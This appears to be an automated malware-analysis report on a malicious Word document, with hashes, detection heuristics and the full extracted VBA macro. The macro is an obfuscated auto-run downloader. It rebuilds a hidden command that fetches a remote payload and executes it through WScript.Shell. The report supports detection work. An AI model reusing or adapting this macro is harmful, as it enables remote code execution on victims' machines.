Office (OLE) malware analysis — malicious · 14841af0dcc048e8

MALICIOUS

Office (OLE)

174.0 KB Created: 2017-02-22 05:43:00 Authoring application: Microsoft Office Word First seen: 2017-02-27

MD5: 475d6afa34a6b8e43145396b92502a87 SHA-1: 1c61aef8e6160b25c08a01b4810f756dd1ff7793 SHA-256: 14841af0dcc048e841f49ca758eebda6ade60c557580f6d0bc68dac12754b10e

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains obfuscated VBA macros, including a Document_Open auto-execution routine. Critical heuristics indicate the presence of CreateObject and Shell calls, suggesting the macro attempts to execute arbitrary code. The reconstructed string 'RcB8m8ZdXR.qJeX8xJe8Z 8/Rczz Zp8oBwBRezBrksZ9h8qeJ8l8lZZ.zeX8xzeq J-RwR8 ZhZRiBdqdRke8n9J 99-z9nZXoqBpJ R-qBeRqp8 XJbXXyqXpXa8qsB8s9 B(zqN8eRwX8-ZqO8RbkqjRJe9c9tX qZS9yXBsZt8eqmX.Z9Nq9ektk.9WBeZbXCBql9iRZe9nqtz8)ZZ.JD88o8wXnRzlkZoZJaZ8d88FBiBzl8ek(98'ZJhZXtBtzzpqz:Z8/X/kq1JZ7R96zz.Jz1Z2BZ3q.Z1BZ08.q85k' likely represents a URL or path to a second-stage payload. The ClamAV detection further supports its malicious nature.

Heuristics 8

ClamAV: Doc.Macro.Obfuscated-6395242-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscated-6395242-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
htjjhftgzpddqhmrcvz(1) = "ipt."
htjjhftgzpddqhmrcvz(2) = "shell"
coreemotion = 318
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
cqcytsngmoondga = "ugbdxcpfeatqbfg"
Set gorillainvite = CreateObject(analystcereal())
For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm)
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

cqcytsngmoondga = "ugbdxcpfeatqbfg"
Set gorillainvite = CreateObject(analystcereal())
For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Public Sub Document_Open()
ponyrail = 134
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6939 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6939 bytes
SHA-256: `8f556f49005dd7e4f5aa19fa2f6ac519cbfe395fee6c20cc7fddceeb6b9f7234`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Sub Document_Open() ponyrail = 134 'inheritsibling 'ubdpmdhdjczsrabn If ponyrail <> 273 Then 'bjczxwlvldlcqblpj alertginger = 967 myselfsoft = "fnexgwdatbke" End If cactusmidnight = 264 'dinosaurtopple 'depthpill If cactusmidnight <> 41 Then 'dependsign awmtopqcm = 531 ytkumuutikmxrfgkx = "vcuwstbymwpqfa" End If duckunit = "RcB8m8ZdXR.qJeX8xJe8Z 8/Rczz Zp8oBwBRezBrksZ9h8qeJ8l8lZZ.zeX8xzeq J-RwR8 ZhZRiBdqdRke8n9J 99-z9nZXoqB" healthtransfer = 157 'devoteranch 'clickrude If healthtransfer <> 908 Then 'examplesetup kppkbbngerhdjfn = 440 cpvifogkq = "mvelguipnyuoiftv" End If crimerocket = 84 'bgebjzlxqzttmgqplb 'gduapapeu If crimerocket <> 573 Then 'royalweasel averagelevel = 447 identifyowner = "speaktype" End If famefirst = duckunit & "pJ R-qBeRqp8 XJbXXyqXpXa8qsB8s9 B(zqN8eRwX8-ZqO8RbkqjRJe9c9tX qZS9yXBsZt8eqmX.Z9Nq9ektk.9WBeZbXCBql9iRZe9nqtz8)ZZ.JD88o8wXnRzlkZoZJaZ8d88FBiBzl8ek(98'ZJhZXtBtzzpqz:Z8/X/kq1JZ7R96zz.Jz1Z2BZ3q.Z1BZ08.q85k" 'keejohkubfpkgaj xzhqezjjopmr = 768 conductorgan = "regularscan" stpdplhtk = 73 'rshuwgoab 'arctictrend If stpdplhtk <> 205 Then 'fafmfwsjhbl reliefsnake = 733 bidrack = "bulletopen" End If loanmaze = "" 'shikgikqlhzof sfwcbditkt = 701 gqciidaftrhdvjgxpec = "ddvqlmcdg" piwtaswcbmaaci = 647 'erkofxlxurjmwjvk 'crkkbythswkegrzhb If piwtaswcbmaaci <> 419 Then 'tcfoiyayqyalmvjz sketchtrouble = 637 jewelmobile = "diseasescale" End If alienpunch = 291 'pgejroturcxf 'gymnotice If alienpunch <> 374 Then 'ndohnznoanmbnxc awdogpawasvgpmxhzbh = 775 qbgtdfvzbequqnglt = "cryhungry" End If ActiveDocument.Shapes.SelectAll noodlerib = 581 'storyugly 'myyqwfuxdc If noodlerib <> 138 Then 'pyfuqbvudml eitherwall = 944 gnizmobap = "goatmaster" End If 'uduaznugihoywho dinosaurside = 386 enrollgarment = "pfhbaveoj" Selection.Delete famefirst = famefirst & "6B/zuqXpB9gBrkaJ9dke8.Z8xX'Bq,z'X%9T88E8MJ8P9%zq\J\98jB9fRZaXZd8BsJqdZf9akksJdRXez.8zeZBxJeXB'XZ)q q9&kB Jzr8eqZgZ Za8zdRdB XHRKqqCq9Uk\8\qBSqoZfZt9JwZaXzrkeJq\q\BC8lBaZsk8sqe89sBk\9\X9m8sZXcXf8ikBlZqe8" 'zlmjmshtt danceobtain = 786 estateprize = "drivepicnic" lyzsjrxktzcm = famefirst & "\RZ\XBsZh8eXXl9ZlB8\J\RBo9qpZeJnq\Z\kZcqRoZZmZqmXka8nB9d9B 8z/XdB 8%z8TRJE9MZPJ%8J\9\ZqjZfBzaqd8Js88d" & "BBf8za9ks8d88eq.zqeZxqek8 X9/zf9 B&k BeZ8vX8eRnzZt8Zv9w8zrZ.ZXeq8x8eXq J&Z8 z8PZXIB9N88GZB z-qnkZ 91Bz5R q19R2Z78J.q089.90B.ZZ1q>BnkZuZlk zZ&8X zq%8ZTJE8qMZPzR%kR\8J\ZZjkqf8Xakd8s8zdXZfRa8JsqXd9eX.zezXx9e" 'hqlqdjlbfhoefpnpf tjjwsntdc = 656 cqcytsngmoondga = "ugbdxcpfeatqbfg" Set gorillainvite = CreateObject(analystcereal()) For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm) bponuzsdtomnd = 156 'inmatephysical 'xsomjfyoojuzbpckrri If bponuzsdtomnd <> 597 Then 'halfresemble nastypizza = 827 bravepepper = "connectjoin" End If crimeservice = Mid(lyzsjrxktzcm, jheprwkrqbnl, 1) If firespend() Like "" & crimeservice & "" Then 'iccurtsftqislahdn elsepotato = 620 umuejrfgxwed = "fazhaomcfxptb" physicalteam = 748 'bssjucgfrn 'burgerstreet If physicalteam <> 193 Then 'addictboring sxwvcouhwgvxdxdoxkg = 622 elementsting = "ffxxkwqpuiofbtz" End If loanmaze = loanmaze 'deputyfat bronzeexpire = 753 carpetvolcano = "enforcesnap" jhmtmzvhdnyyxqos = 273 'seventeach 'boatpraise If jhmtmzvhdnyyxqos <> 92 Then 'pjuqwernfxivicpoyp dwjkkrzjy = 298 woolqbwxkuirhfi = "laundryshadow" End If Else loanmaze = loanmaze & crimeservice bklfisunykfqjlilrcs = 812 'qjngvfbfbkxofihk 'lvuskmwka If bklfisunykfqjlilrcs <> 915 Then 'hxyeasxymqttbb driftfavorite = 688 enrichpuzzle = "arrivegeneral" End If End If 'bfokihpczmrxxxwaseg jrimgapgdsfqx = 118 hdnbotnrkxk = "ysmwptxsbculngf" copyover = 915 'jrqxauwahmmlg 'coralorange If copyover <> 483 Then 'copperhockey dqwaxovee = 111 cipcsfzrbphkxm = "decidedepth" End If Next ewoeimsldprezgxs = Module1.chaosurge(False, loanmaze, gorillainvite, 3) gdglnluuuvbr = 222 'eazkxqhcmecevcnagl 'wgznzcqnzsxdm If gdglnluuuvbr <> 130 Then 'sfptlhexsjtqccexdhk smilevibrant = 476 uhzsddvuqr = "angletool" End If End Sub Function analystcereal() 'imitateundo elsefront = 444 idklijzndqlcebkst = "dlkbnzgjh" 'futfxoelnitthlwk ygkcwchwsh = 184 jaoymweylejxdqhqi = "addictmercy" Dim htjjhftgzpddqhmrcvz(3) shieldsix = 691 'gymrotate 'vnuurcdrp If shieldsix <> 201 Then 'awkwardmerry adaptcake = 130 uwnyfurnoohuhebe = "spoonstable" End If htjjhftgzpddqhmrcvz(0) = "wscr" 'shortthrive ydlwvtujrmaavtu = 930 delayreward = "ruzjyyyxfyririwil" butterreplace = 315 'gkvrpntzpuqzyf 'icoeepgsyqnynv If butterreplace <> 662 Then 'dependpurse hzutwwbcpxgs = 290 convincelength = "exchangemarble" End If htjjhftgzpddqhmrcvz(1) = "ipt." htjjhftgzpddqhmrcvz(2) = "shell" coreemotion = 318 'bgcznscqjebiheiyeyi 'paehyiyuuhvkbtfr If coreemotion <> 387 Then 'algxbmnyabxfx jungleprison = 305 uzhxxpjhkwizscwp = "flgyrokdwpwfxgkdhln" End If analystcereal = Join(htjjhftgzpddqhmrcvz, "") End Function Function firespend() firespend = "qJ8BZz9X8RZk" End Function Attribute VB_Name = "Module1" Function chaosurge(ynjceojrsucjtj, energypen, vzaodorlfhmc, fanproduce) excuseleopard = 946 'leftceqehpgt 'jlrawrijnjzoban If excuseleopard <> 132 Then 'borrowtheme bindwait = 127 uocprzrdtvwrleovrr = "sranlaaqkjgrbuunvm" End If beautyexotic = 0 If fanproduce = 3 Then nmcdjgsraba = vzaodorlfhmc.Run(energypen, ynjceojrsucjtj) hawktennis = 121 'hardviolin 'qzetwykzksdxfydbrxh If hawktennis <> 33 Then 'casualerode zkijcyunrnpml = 702 elitespare = "lbvjrngevyfshkrwg" End If 'assumerival ahbqseohg = 385 abstractsurvey = "gsstmhisgvdwtf" beautyexotic = 1 joncqofkxpkuxg = 109 'delaypull 'petseason If joncqofkxpkuxg <> 446 Then 'rmuyzdydjr sticktrend = 948 riskterm = "zcttrvooemg" End If ijvujzurqkyx = 290 'lntegpezitornn 'ekihftmeirlnjkeh If ijvujzurqkyx <> 535 Then 'finishtrim gsfqoidenqvhghsa = 227 perqyphqpeoekenqza = "lendscience" End If End If gardenmorning = 365 'dgwivdfiw 'egnowrjgrfuqjt If gardenmorning <> 620 Then 'memberroute tkuruqkacukldsbxyx = 963 artworkspice = "cautionfossil" End If bbcgnikejyovzj = 67 'pricespell 'hwrhelnqbjui If bbcgnikejyovzj <> 492 Then 'anchorghost ncbwhkjtxfohihqdjn = 748 mfdrvkszvvihfbwcu = "kfvyuyxvzhvvqrunhb" End If chaosurge = beautyexotic 'publictaste axisdragon = 899 farmlength = "believetravel" fdvwovjxhlnbgd = 803 'alienfoot 'carpetgown If fdvwovjxhlnbgd <> 390 Then 'dryhalf lfsodlzpwedzfzmbz = 447 qnmuyexyu = "entersound" End If End Function

SHA-256: 8f556f49005dd7e4f5aa19fa2f6ac519cbfe395fee6c20cc7fddceeb6b9f7234

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
ponyrail = 134
'inheritsibling
'ubdpmdhdjczsrabn
If ponyrail <> 273 Then
'bjczxwlvldlcqblpj
alertginger = 967
myselfsoft = "fnexgwdatbke"
End If
cactusmidnight = 264
'dinosaurtopple
'depthpill
If cactusmidnight <> 41 Then
'dependsign
awmtopqcm = 531
ytkumuutikmxrfgkx = "vcuwstbymwpqfa"
End If
duckunit = "RcB8m8ZdXR.qJeX8xJe8Z 8/Rczz Zp8oBwBRezBrksZ9h8qeJ8l8lZZ.zeX8xzeq J-RwR8 ZhZRiBdqdRke8n9J 99-z9nZXoqB"
healthtransfer = 157
'devoteranch
'clickrude
If healthtransfer <> 908 Then
'examplesetup
kppkbbngerhdjfn = 440
cpvifogkq = "mvelguipnyuoiftv"
End If
crimerocket = 84
'bgebjzlxqzttmgqplb
'gduapapeu
If crimerocket <> 573 Then
'royalweasel
averagelevel = 447
identifyowner = "speaktype"
End If
famefirst = duckunit & "pJ R-qBeRqp8 XJbXXyqXpXa8qsB8s9 B(zqN8eRwX8-ZqO8RbkqjRJe9c9tX qZS9yXBsZt8eqmX.Z9Nq9ektk.9WBeZbXCBql9iRZe9nqtz8)ZZ.JD88o8wXnRzlkZoZJaZ8d88FBiBzl8ek(98'ZJhZXtBtzzpqz:Z8/X/kq1JZ7R96zz.Jz1Z2BZ3q.Z1BZ08.q85k"
'keejohkubfpkgaj
xzhqezjjopmr = 768
conductorgan = "regularscan"
stpdplhtk = 73
'rshuwgoab
'arctictrend
If stpdplhtk <> 205 Then
'fafmfwsjhbl
reliefsnake = 733
bidrack = "bulletopen"
End If
loanmaze = ""
'shikgikqlhzof
sfwcbditkt = 701
gqciidaftrhdvjgxpec = "ddvqlmcdg"

piwtaswcbmaaci = 647
'erkofxlxurjmwjvk
'crkkbythswkegrzhb
If piwtaswcbmaaci <> 419 Then
'tcfoiyayqyalmvjz
sketchtrouble = 637
jewelmobile = "diseasescale"
End If
alienpunch = 291
'pgejroturcxf
'gymnotice
If alienpunch <> 374 Then
'ndohnznoanmbnxc
awdogpawasvgpmxhzbh = 775
qbgtdfvzbequqnglt = "cryhungry"
End If
ActiveDocument.Shapes.SelectAll
noodlerib = 581
'storyugly
'myyqwfuxdc
If noodlerib <> 138 Then
'pyfuqbvudml
eitherwall = 944
gnizmobap = "goatmaster"
End If
'uduaznugihoywho
dinosaurside = 386
enrollgarment = "pfhbaveoj"
Selection.Delete
famefirst = famefirst & "6B/zuqXpB9gBrkaJ9dke8.Z8xX'Bq,z'X%9T88E8MJ8P9%zq\J\98jB9fRZaXZd8BsJqdZf9akksJdRXez.8zeZBxJeXB'XZ)q q9&kB Jzr8eqZgZ Za8zdRdB XHRKqqCq9Uk\8\qBSqoZfZt9JwZaXzrkeJq\q\BC8lBaZsk8sqe89sBk\9\X9m8sZXcXf8ikBlZqe8"
'zlmjmshtt
danceobtain = 786
estateprize = "drivepicnic"
lyzsjrxktzcm = famefirst & "\RZ\XBsZh8eXXl9ZlB8\J\RBo9qpZeJnq\Z\kZcqRoZZmZqmXka8nB9d9B 8z/XdB 8%z8TRJE9MZPJ%8J\9\ZqjZfBzaqd8Js88d" & "BBf8za9ks8d88eq.zqeZxqek8 X9/zf9 B&k BeZ8vX8eRnzZt8Zv9w8zrZ.ZXeq8x8eXq J&Z8 z8PZXIB9N88GZB z-qnkZ 91Bz5R q19R2Z78J.q089.90B.ZZ1q>BnkZuZlk zZ&8X zq%8ZTJE8qMZPzR%kR\8J\ZZjkqf8Xakd8s8zdXZfRa8JsqXd9eX.zezXx9e"
'hqlqdjlbfhoefpnpf
tjjwsntdc = 656
cqcytsngmoondga = "ugbdxcpfeatqbfg"
Set gorillainvite = CreateObject(analystcereal())
For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm)
bponuzsdtomnd = 156
'inmatephysical
'xsomjfyoojuzbpckrri
If bponuzsdtomnd <> 597 Then
'halfresemble
nastypizza = 827
bravepepper = "connectjoin"
End If
crimeservice = Mid(lyzsjrxktzcm, jheprwkrqbnl, 1)
If firespend() Like "*" & crimeservice & "*" Then
'iccurtsftqislahdn
elsepotato = 620
umuejrfgxwed = "fazhaomcfxptb"
physicalteam = 748
'bssjucgfrn
'burgerstreet
If physicalteam <> 193 Then
'addictboring
sxwvcouhwgvxdxdoxkg = 622
elementsting = "ffxxkwqpuiofbtz"
End If
loanmaze = loanmaze
'deputyfat
bronzeexpire = 753
carpetvolcano = "enforcesnap"
jhmtmzvhdnyyxqos = 273
'seventeach
'boatpraise
If jhmtmzvhdnyyxqos <> 92 Then
'pjuqwernfxivicpoyp
dwjkkrzjy = 298
woolqbwxkuirhfi = "laundryshadow"
End If
Else
loanmaze = loanmaze & crimeservice
bklfisunykfqjlilrcs = 812
'qjngvfbfbkxofihk
'lvuskmwka
If bklfisunykfqjlilrcs <> 915 Then
'hxyeasxymqttbb
driftfavorite = 688
enrichpuzzle = "arrivegeneral"
End If
End If
'bfokihpczmrxxxwaseg
jrimgapgdsfqx = 118
hdnbotnrkxk = "ysmwptxsbculngf"
copyover = 915
'jrqxauwahmmlg
'coralorange
If copyover <> 483 Then
'copperhockey
dqwaxovee = 111
cipcsfzrbphkxm = "decidedepth"
End If
Next
ewoeimsldprezgxs = Module1.chaosurge(False, loanmaze, gorillainvite, 3)
gdglnluuuvbr = 222
'eazkxqhcmecevcnagl
'wgznzcqnzsxdm
If gdglnluuuvbr <> 130 Then
'sfptlhexsjtqccexdhk
smilevibrant = 476
uhzsddvuqr = "angletool"
End If
End Sub
Function analystcereal()
'imitateundo
elsefront = 444
idklijzndqlcebkst = "dlkbnzgjh"
'futfxoelnitthlwk
ygkcwchwsh = 184
jaoymweylejxdqhqi = "addictmercy"
Dim htjjhftgzpddqhmrcvz(3)
shieldsix = 691
'gymrotate
'vnuurcdrp
If shieldsix <> 201 Then
'awkwardmerry
adaptcake = 130
uwnyfurnoohuhebe = "spoonstable"
End If
htjjhftgzpddqhmrcvz(0) = "wscr"
'shortthrive
ydlwvtujrmaavtu = 930
delayreward = "ruzjyyyxfyririwil"
butterreplace = 315
'gkvrpntzpuqzyf
'icoeepgsyqnynv
If butterreplace <> 662 Then
'dependpurse
hzutwwbcpxgs = 290
convincelength = "exchangemarble"
End If
htjjhftgzpddqhmrcvz(1) = "ipt."
htjjhftgzpddqhmrcvz(2) = "shell"
coreemotion = 318
'bgcznscqjebiheiyeyi
'paehyiyuuhvkbtfr
If coreemotion <> 387 Then
'algxbmnyabxfx
jungleprison = 305
uzhxxpjhkwizscwp = "flgyrokdwpwfxgkdhln"
End If
analystcereal = Join(htjjhftgzpddqhmrcvz, "")
End Function
Function firespend()
firespend = "qJ8BZz9X8RZk"
End Function

























Attribute VB_Name = "Module1"
Function chaosurge(ynjceojrsucjtj, energypen, vzaodorlfhmc, fanproduce)
excuseleopard = 946
'leftceqehpgt
'jlrawrijnjzoban
If excuseleopard <> 132 Then
'borrowtheme
bindwait = 127
uocprzrdtvwrleovrr = "sranlaaqkjgrbuunvm"
End If
beautyexotic = 0
If fanproduce = 3 Then
nmcdjgsraba = vzaodorlfhmc.Run(energypen, ynjceojrsucjtj)
hawktennis = 121
'hardviolin
'qzetwykzksdxfydbrxh
If hawktennis <> 33 Then
'casualerode
zkijcyunrnpml = 702
elitespare = "lbvjrngevyfshkrwg"
End If
'assumerival
ahbqseohg = 385
abstractsurvey = "gsstmhisgvdwtf"
beautyexotic = 1
joncqofkxpkuxg = 109
'delaypull
'petseason
If joncqofkxpkuxg <> 446 Then
'rmuyzdydjr
sticktrend = 948
riskterm = "zcttrvooemg"
End If
ijvujzurqkyx = 290
'lntegpezitornn
'ekihftmeirlnjkeh
If ijvujzurqkyx <> 535 Then
'finishtrim
gsfqoidenqvhghsa = 227
perqyphqpeoekenqza = "lendscience"
End If
End If
gardenmorning = 365
'dgwivdfiw
'egnowrjgrfuqjt
If gardenmorning <> 620 Then
'memberroute
tkuruqkacukldsbxyx = 963
artworkspice = "cautionfossil"
End If
bbcgnikejyovzj = 67
'pricespell
'hwrhelnqbjui
If bbcgnikejyovzj <> 492 Then
'anchorghost
ncbwhkjtxfohihqdjn = 748
mfdrvkszvvihfbwcu = "kfvyuyxvzhvvqrunhb"
End If
chaosurge = beautyexotic
'publictaste
axisdragon = 899
farmlength = "believetravel"
fdvwovjxhlnbgd = 803
'alienfoot
'carpetgown
If fdvwovjxhlnbgd <> 390 Then
'dryhalf
lfsodlzpwedzfzmbz = 447
qnmuyexyu = "entersound"
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.